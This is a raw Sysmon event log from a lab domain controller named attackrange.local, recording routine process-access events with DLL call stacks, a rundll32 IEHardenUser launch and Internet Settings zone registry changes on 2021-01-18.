13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.351{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000011286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.336{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.320{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1976C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.320{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{00000000-0000-0000-0000-000000000000}1976C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.322{59A5CD1D-9405-6005-0805-00000000A301}1976C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 13241300x800000000000000011281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.305{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000) 13241300x800000000000000011280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.289{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003) 13241300x800000000000000011279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:29.195{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000) 10341000x800000000000000011500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.961{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.945{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.945{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 